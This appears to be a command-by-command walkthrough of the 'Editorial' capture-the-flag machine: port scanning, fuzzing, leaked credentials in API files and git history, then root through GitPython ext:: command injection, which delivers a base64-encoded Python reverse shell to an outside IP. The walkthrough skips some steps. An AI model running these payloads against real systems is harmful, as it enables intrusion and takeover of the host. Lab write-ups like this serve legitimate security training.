sudo nmap -p- --open -sS --min-rate 5000 -vvv -n -Pn --disable-arp-ping -oG allPorts
22/tcp open ssh syn-ack ttl 63
80/tcp open http syn-ack ttl 63
sudo nmap -p22,80 -sCV -oN targeted
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 0d:ed:b2:9c:e2:53:fb:d4:c8:c1:19:6e:75:80:d8:64 (ECDSA)
|_ 256 0f:b9:a7:51:0e:00:d5:7b:5b:7c:5f:bf:2b:ed:53:a0 (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://editorial.htb
|_http-server-header: nginx/1.18.0 (Ubuntu)
sudo sh -c 'echo " editorial.htb" >> /etc/hosts'

ffuf -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-small.txt -u http://editorial.htb/FUZZ
about [Status: 200, Size: 2939, Words: 492, Lines: 72, Duration: 408ms]
upload [Status: 200, Size: 7140, Words: 1952, Lines: 210, Duration: 257ms]

wget http://editorial.htb/static/uploads/505d9868-515a-42ef-bd63-9fdc41931d2d
cat 505d9868-515a-42ef-bd63-9fdc41931d2d | jq
"messages": [
"promotions": {
"description": "Retrieve a list of all the promotions in our library.",
"endpoint": "/api/latest/metadata/messages/promos",
"methods": "GET"
"coupons": {
"description": "Retrieve the list of coupons to use in our library.",
"endpoint": "/api/latest/metadata/messages/coupons",
"methods": "GET"
"new_authors": {
"description": "Retrieve the welcome message sended to our new authors.",
"endpoint": "/api/latest/metadata/messages/authors",
"methods": "GET"
"platform_use": {
"description": "Retrieve examples of how to use the platform.",
"endpoint": "/api/latest/metadata/messages/how_to_use_platform",
"methods": "GET"
"version": [
"changelog": {
"description": "Retrieve a list of all the versions and updates of the api.",
"endpoint": "/api/latest/metadata/changelog",
"methods": "GET"
"latest": {
"description": "Retrieve the last version of api.",
"endpoint": "/api/latest/metadata",
"methods": "GET"
wget http://editorial.htb/static/uploads/16e0ad2c-3be1-4c8c-b05f-8e1c0a4a92c7
cat 16e0ad2c-3be1-4c8c-b05f-8e1c0a4a92c7 | jq
"template_mail_message": "Welcome to the team! We are thrilled to have you on board and can't wait to see the incredible content you'll bring to the table.\n\nYour login credentials for our internal forum and authors site are:\nUsername: dev\nPassword: dev080217_devAPI!@\nPlease be sure to change your password as soon as possible for security purposes.\n\nDon't hesitate to reach out if you have any questions or ideas - we're always here to support you.\n\nBest regards, Editorial Tiempo Arriba Team."
-bash-5.1$ cat user.txt
Privilege escalation
-bash-5.1$ cd apps
-bash-5.1$ ls -la
total 12
drwxrwxr-x 3 dev dev 4096 Jun 5 14:36 .
drwxr-x--- 6 dev dev 4096 Jun 22 19:36 ..
drwxr-xr-x 8 dev dev 4096 Jun 5 14:36 .git
git log -p
with the following command you will see only the commit that is relevant
git show b73481bb823d2dfb49c44f4c1e6a7e11912ed8ae
commit b73481bb823d2dfb49c44f4c1e6a7e11912ed8ae
Author: dev-carlos.valderrama <dev-carlos.valderrama@tiempoarriba.htb>
Date: Sun Apr 30 20:55:08 2023 -0500
change(api): downgrading prod to dev
* To use development environment.
diff --git a/app_api/app.py b/app_api/app.py
index 61b786f..3373b14 100644
--- a/app_api/app.py
+++ b/app_api/app.py
@@ -64,7 +64,7 @@ def index():
@app.route(api_route + '/authors/message', methods=['GET'])
def api_mail_new_authors():
return jsonify({
- 'template_mail_message': "Welcome to the team! We are thrilled to have you on board and can't wait to see the incredible content you'll bring to the table.\n\nYour login credentials for our internal forum and authors site are:\nUsername: prod\nPassword: 080217_Producti0n_2023!@\nPlease be sure to change your password as soon as possible for security purposes.\n\nDon't hesitate to reach out if you have any questions or ideas - we're always here to support you.\n\nBest regards, " + api_editorial_name + " Team."
+ 'template_mail_message': "Welcome to the team! We are thrilled to have you on board and can't wait to see the incredible content you'll bring to the table.\n\nYour login credentials for our internal forum and authors site are:\nUsername: dev\nPassword: dev080217_devAPI!@\nPlease be sure to change your password as soon as possible for security purposes.\n\nDon't hesitate to reach out if you have any questions or ideas - we're always here to support you.\n\nBest regards, " + api_editorial_name + " Team."
}) # TODO: replace dev credentials when checks pass
# -------------------------------
-bash-5.1$ su prod
bash-5.1$ sudo -l
[sudo] password for prod:
Matching Defaults entries for prod on editorial:
env_reset, mail_badpass,
User prod may run the following commands on editorial:
(root) /usr/bin/python3
/opt/internal_apps/clone_changes/clone_prod_change.py *
bash-5.1$ cd /opt/internal_apps/clone_changes/
bash-5.1$ pwd
bash-5.1$ cat clone_prod_change.py
import os
import sys
from git import Repo
url_to_clone = sys.argv[1]
r = Repo.init('', bare=True)
r.clone_from(url_to_clone, 'new_changes', multi_options=["-c protocol.ext.allow=always"])
bash-5.1$ pip3 list
GitPython 3.1.29
vulnerability in GitPython < 3.1.30
bash-5.1$ sudo /usr/bin/python3 /opt/internal_apps/clone_changes/clone_prod_change.py "ext::sh -c echo% cHl0aG9uMyAtYyAnaW1wb3J0IHNvY2tldCxzdWJwcm9jZXNzLG9zO3M9c29ja2V0LnNvY2tldChzb2NrZXQuQUZfSU5FVCxzb2NrZXQuU09DS19TVFJFQU0pO3MuY29ubmVjdCgoIjEwLjEwLjE0LjM5Iiw0MDAwKSk7b3MuZHVwMihzLmZpbGVubygpLDApOyBvcy5kdXAyKHMuZmlsZW5vKCksMSk7b3MuZHVwMihzLmZpbGVubygpLDIpO2ltcG9ydCBwdHk7IHB0eS5zcGF3bigiL2Jpbi9iYXNoIikn% |% base64% -d% >% /tmp/reverse_shell.sh;% chmod% +x% /tmp/reverse_shell.sh"
bash-5.1$ bash-5.1$ ls -l /tmp/reverse_shell.sh
-rwxr-xr-x 1 root root 225 Jun 23 08:23 /tmp/reverse_shell.sh
nc -nlvp 4000
bash-5.1$ sudo /usr/bin/python3 /opt/internal_apps/clone_changes/clone_prod_change.py "ext::sh -c /tmp/reverse_shell.sh"
root@editorial:/opt/internal_apps/clone_changes# cd /root
root@editorial:~# cat root.txt